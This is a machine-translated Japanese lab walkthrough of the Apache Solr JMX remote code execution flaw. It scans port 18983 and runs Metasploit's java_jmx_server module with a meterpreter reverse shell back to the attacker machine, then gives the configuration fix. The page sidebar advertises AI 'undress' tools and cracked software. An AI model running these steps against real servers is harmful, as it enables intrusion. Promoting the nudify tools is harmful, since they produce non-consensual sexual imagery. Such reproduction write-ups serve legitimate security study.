検索
ホームページ運用・保守安全性Apache Solr JMX サービスで RCE 脆弱性を再現する方法

0x00はじめに

Solr は、Web サービスに似た API インターフェイスを提供する独立したエンタープライズ レベルの検索アプリケーション サーバーです。ユーザーは、http リクエストを通じて特定の形式の XML ファイルを検索エンジン サーバーに送信してインデックスを生成できます。また、HTTP Get オペレーションを通じて検索リクエストを作成し、XML 形式で返された結果を取得することもできます。

この脆弱性は、デフォルト設定ファイル solr.in.sh の ENABLE_REMOTE_JMX_OPTS 設定オプションのセキュリティ リスクに起因します。

ENABLE_REMOTE_JMX_OPTS="true" オプションは、Apache Solr バージョン 8.1.1 および 8.2.0 の組み込み構成ファイル solr.in.sh に存在します。

影響を受けるバージョンのデフォルトの solr.in.sh ファイルを使用する場合、JMX モニタリングが有効になり、RMI_PORT (デフォルト = 18983) で公開されます。

何もする必要はありません。認証。このポートがファイアウォールの受信トラフィック用に開かれている場合、Solr ノードにネットワーク アクセスできる人は誰でも JMX にアクセスでき、

は悪意のあるコードをアップロードして Solr サーバー上で実行できるようになります。この脆弱性は Windows システムのユーザーには影響しませんが、Linux の一部のバージョンのユーザーにのみ影響します。

0x01 影響を受けるバージョン

Apache Solr8.1.1 バージョンのオンライン時間: 2019-05-28

Apache Solr8.2.0 バージョンのオンライン時間: 2019- 07-25

0x02 脆弱性の危険

被害者がこのデフォルト設定を使用すると、JMX サービスはデフォルトのポート 18983 で開かれ、認証は有効になりません。デフォルトでは。このポートにアクセスできる攻撃者は、この脆弱性を悪用して、影響を受けるサービスに対して攻撃を開始し、任意のコードを実行する可能性があります。

0x03 環境構築

Java 環境と kali システム、Solr 8.20

Solr 8.20 ダウンロードアドレス:

wget http:/ /archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

如何进行Apache Solr JMX服务RCE漏洞复现

unzip solr-8.2.0.zip を使用して解凍します

如何进行Apache Solr JMX服务RCE漏洞复现#解凍が完了したら、bin ディレクトリに切り替えて Solr

./solr start -force

## を起動します。

#起動後のアクセス: http://192.168.10.176:8983/如何进行Apache Solr JMX服务RCE漏洞复现

如何进行Apache Solr JMX服务RCE漏洞复现#0x04 脆弱性再発

攻撃マシン: kali IP: 192.168.10.147

被害マシン: Ubuntu18.6 の docker IP: 192.168.10.184:8983

1. nmap を使用してポートをスキャンし、ポート 18983 が開いていることを確認します

2. Metasploit のexploit/multi/misc/java_jmx_server モジュールを使用して脆弱性を再現します如何进行Apache Solr JMX服务RCE漏洞复现

Ø 使用しますexploit/multi/misc/java_jmx_server

Ø set RHOST 192.168.10.184

Ø set RPORT 18983

ペイロードを設定: java/meterpreter/reverse_tcp如何进行Apache Solr JMX服务RCE漏洞复现

Ø set ペイロード java /meterpreter/ reverse_tcp

Ø set LHOST 192.168.10.147

Ø set LPORT 4444

#3. run を使用して実行すると、次の内容が表示されます。正常に確立された接続如何进行Apache Solr JMX服务RCE漏洞复现

如何进行Apache Solr JMX服务RCE漏洞复现0x05 修正提案

solr.in.sh 設定ファイルの ENABLE_REMOTE_JMX_OPTS オプションを false に設定し、 Solr サーブを再起動します。

以上がApache Solr JMX サービスで RCE 脆弱性を再現する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

声明
この記事は亿速云で複製されています。侵害がある場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

Video Face Swap

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

ホットツール

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser は、オンライン試験を安全に受験するための安全なブラウザ環境です。このソフトウェアは、あらゆるコンピュータを安全なワークステーションに変えます。あらゆるユーティリティへのアクセスを制御し、学生が無許可のリソースを使用するのを防ぎます。

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

DVWA

DVWA

Damn Vulnerable Web App (DVWA) は、非常に脆弱な PHP/MySQL Web アプリケーションです。その主な目的は、セキュリティ専門家が法的環境でスキルとツールをテストするのに役立ち、Web 開発者が Web アプリケーションを保護するプロセスをより深く理解できるようにし、教師/生徒が教室環境で Web アプリケーションを教え/学習できるようにすることです。安全。 DVWA の目標は、シンプルでわかりやすいインターフェイスを通じて、さまざまな難易度で最も一般的な Web 脆弱性のいくつかを実践することです。このソフトウェアは、

EditPlus 中国語クラック版

EditPlus 中国語クラック版

サイズが小さく、構文の強調表示、コード プロンプト機能はサポートされていません

VSCode Windows 64 ビットのダウンロード

VSCode Windows 64 ビットのダウンロード

Microsoft によって発売された無料で強力な IDE エディター